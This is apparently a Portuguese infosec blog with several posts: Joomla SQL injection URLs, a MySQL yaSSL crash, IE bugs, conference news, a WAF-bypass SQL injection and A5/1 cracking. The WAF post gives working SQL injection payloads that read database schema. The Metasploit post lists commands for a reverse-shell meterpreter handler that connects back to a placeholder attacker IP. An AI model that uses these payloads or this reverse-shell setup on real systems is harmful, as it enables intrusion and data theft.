Algumas falhas do Joomla foram publicadas, check it out!
Job Component
http://server/index.php?option=com_job&controller=listcategory&task=viewJob&id_job=[SQL]
Yelp Component
http://server/index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=[SQL]
Fonte: Exploit-DB
O bug existe na biblioteca yassl que é distribuído com o MySQL.
Sessão debugada no 5.5.0-m2
suse11:~ # gdb -q
(gdb) att 5542
Attaching to process 5542
Reading symbols from /var/mysql/libexec/mysqld…cdone.
…
0xffffe430 in __kernel_vsyscall ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb6bbab90 (LWP 5545)]
0×41424344 in ?? ()
(gdb)
O PoC pode ser encontrado aqui.
Dois crashes causados por NULL Pointer Dereferences foram descobertos pelo cara desse blog e publicados na lista Full-Disclousure, segundo o autor o problema não afeta a versão 8.0 do browser da MS.
Simples não? 
O autor não parece relatar sobre patches ou atualizações, então creio que seja 0day, agora basta uma mente curiosa pra fazer a vulnerabilidade ser rentável == explorável.
Dá mais um pouco de bafafá… chega de Aurora, que eu não publiquei a respeito.. ehehe..
Mas aqui vai um pouco da história: ‘Aurora’ Exploit Retooled To Bypass Internet Explorer’s DEP Security
[Atualizado]
Testei na versão 7.0:
Muito tempo se passou desde o último post, várias coisas aconteceram no mundo do InfoSec, então volto com um post que tentarei colocar os assuntos em dia:
1 – Vídeos da YSTS 3.0
Os vídeos da YSTS 3.0 foram (finalmente, ehehhe) divulgados! Agora quem não foi pode assistir todas as apresentações no vasco!
http://www.vimeo.com/tag:ysts3dot0
2 – H2HC (http://www.h2hc.org.br)
Nos dias 28-29 de Novembro de 2009 foi realizado em São Paulo Capital no Novotel Morumbi, fantástica organização, o evento se tornou realmente diferenciado, palestras excelentes (é, eu palestrei por lá também 
) e com o reencontro de toda a galera fantástica que sempre vai as confs de segurança. Realmente tivemos boas horas relaxantes no bar, trocando muita idéia e dando muita risada!
Até agora os slides ainda não foram divulgados porém deve ser feito isso em breve e ainda os vídeos das apresentações. Então quem não foi, segue a galera do twitter (alias o meu é @mphx2) e veja quando rola.
3 – CFP da YSTS 4.0
É isso aí, após divulgarem os vídeos da YSTS 3.0, o pessoal (Nelson/Luiz Eduardo/Mr. Billy) voltam a quebrar os paradigmas e botam data na quarta versão de uma conferência já consagrada (por nós 
), vai ser no dia 17 de Maio de 2010 (meu aniversário, uhuuu) e com a data da conferência, é claro abriram a chamada de trabalhos:
Quem nunca foi, TEM que ir. E com certeza se você já foi uma vez, irá novamente! 
4 – i sh0t the sheriff 71 e 72 Lançados
5 – CCC
A CCC famosa conferência hacker aconteceu e trouxe algumas coisas a tonas, estudos novos com novas aplicações, etc. Uma das “novidades” foi o cracking do A5/1 de forma mais prática através de gigantes RainbowTables e aparelhagem de rádio, vale a pena olhar, os vídeos e pdfs já estão disponíveis.
Mais infos: http://events.ccc.de/congress/2009/Fahrplan/
6 – Acho que é só isso, tem uma última novidade mas deixarei pra semana que vem!
Espero não deixar muito parado isso aqui né, mas twitter mata a gnt!
Hoje em dia com os inúmeros ataques via aplicações web com banco de dados e suas facilidades, o uso de WAF (Web Application Firewall) está sendo mais comum.
O WAF pode trabalhar basicamente de 3 formas: Blacklist, Whitelist e Profiling, sendo que a mais comum aplicada (mais fácil de ser implementada) é blacklist, onde são passado em forma de pattern match as expressões que serão bloqueadas caso haja o acesso, mesmo sabendo que o método através de padronização de expressões é falho por padrão ainda se tem que “procurar” alguma forma que invalide a expressão cadastrada no WAF e hoje um pesquisador achou outra forma de conseguir a injeção de códigos mesmo com ele implementado.
A “solução” é bem simples, bastar usar de comentários /* xpto */ para que a linha inserida seja ignorada pelo WAF e reproduzida no sistema, como no exemplo dado pelo pesquisador:
Desta forma, ainda seria bloqueada:
id=1+union/*&id=*/select+table_name+from+information_schema.columns
Mas, se utlizarmos toda a instrução comentada:
id=1/*!limit+0+union+select+concat_ws(0×3a,table_name,column_name)+from+information_schema.columns*/
Teremos sucesso na exploitação, simples e eficaz!
Como já até mesmo comentado no blog do autor, a solução DESTA thread é bem simples “/*!”, porém a atualização dos WAFs não deve ser tão imediata mas quem quiser pode fazer a regra manualmente, coisa bem difícil de ver por aí
Check it out dudes!
http://conference.hackinthebox.org/hitbsecconf2009kl/materials/
É isso aí meus caros leitores (todos vocês 2, rsrs) acabei de chegar de viagem… sem comentários a Malásia é demaaaais! E a HITB mais ainda, muito bem organizada, me senti realmente em casa, o crew realmente demais, minha palestra acho que no final foi tudo de bom, aguardem pelo vídeo que deve ser lançado em breve! Vou por algumas fotos aqui pra galera se divertir:
É isso aí galera, deve ter um post de fotos da galera do HITB… Valeu por todos que deram feedback e aqueles que apoiaram uhuu!!!
Recentemente o blog do Metasploit divulgou uma nova funcionalidade do famoso framework, entendendo que vários administradores possuem restrições quanto ao acesso a serviços/portas na Internet, e é cansativo o acesso manual de porta a porta para o tal ataque, agora os pentesters de plantão ficarão um pouco mais aliviado!
O novo payload reverse_tcp_allports tenta fazer a conexão reversa através de uma porta pré-determinada pelo responsável pelo ataque, caso esta porta esteje negada o acesso, o payload tenta porta a porta de 1 a 65535 e se caso disponível irá se conectar a porta, também definida pelo atacante, no servidor responsável que receberá a conexão reversa (connect-back).
O único incomodo é que em plataformas Windows, por utilizar do método connect() (por ser mais “ágil”), aguarda-se um timeout do servidor caso a porta esteja fechada para se determinar o status, sendo as vezes demorando até um minuto (poucos casos, segundo o blog) mas mesmo assim com certeza é algo que será utilizado muito (antes uma hora o computador trabalhando pra você, do que você trabalhando pra ele).
A ativação começa da seguinte forma, você primeiramente precisa de um IP disponível e uma regra de FW, no caso, queremos que todas as conexões recebidas em qualquer porta vá para a porta 4444, sendo assim em IPTABLES temos:
# iptables -I INPUT -p tcp -m state –state NEW -d A.B.C.D -j DNAT –to A.B.C.D:4444
Agora configuramos o payload:
msf> use exploit/multi/handler
msf (exploit/handler) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
msf (exploit/handler) > set LHOST A.B.C.D
msf (exploit/handler) > set LPORT 4444
msf (exploit/handler) > exploit -j
Depois, disso desabilitamos o “PayloadHandler” para que o código não seja executado:
msf (exploit/browser0day) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
msf (exploit/browser0day) > set LHOST A.B.C.D
msf (exploit/browser0day) > set LPORT 1
msf (exploit/browser0day) > set DisablePayloadHandler true
msf (exploit/browser0day) > exploit
Sendo assim, o payload tentará se conectar as portas caso haja sucesso na conexão, ele será repassado a porta 4444 que ativará o código e assim dará o acesso a máquina alvo.
Isso porque SEMPRE há uma porta, quando os administradores fazem manutenções ou qualquer outro tipo de teste é comum que a regra aplicada não seja mudada, isto por preguiça/incompetência/mal-gerenciamento é indiscutível o nível problemático, já vi vários ambientes tecnológicos de pequeno porte até médio-grande porte e em todos se encaixam no problema, sem exceções.
Vejo esta questão como um problema maior, mais do que um poupador de tempo para o atacante, a confiança numa configuração falha já é tão comum, observo isso a tempos e uso em meus projetos que a partir do momento que começarmos explorar/automatizar isso de uma melhor forma, a necessidade de 0days para um ataque remoto será bem menor do que hoje é.
Fonte: http://www.focus.com/fyi/it-security/history-hacking/
Pois é, após várias tentativas por grupos como THC e outros white papers explicando como funciona a criptografia A5/* e supostos ataques parece que foi finalmente divulgada (ou será?) um meio de se quebrar o famoso algoritmo responsável pela criptografia de conversas via GSM.
A mensagem divulgada pelo site The Register confirma que o ataque que é direcionado ao A5/1 e A5/2, o ataque garantiria uma “escuta” em operadoras que trabalham com a versão 2G de telefonia GSM.
O grupo responsável (não divulgado) diz que várias pessoas já estão fazendo suas façanhas utilizando apenas de um laptop e uma antena, o que promete ser divulgado na CCC, em contra-mão os mesmos pesquisadores garantem que o A5/3 (utilizado na telefonia 3G) demorará ainda um tempo para poder se quebrar.
Bom, agora depende de nós esperarmos pra ver como foi possível o ataque… se foi utilizado algum estudo anterior ou se é algo totalmente novo… quem viver, verá!
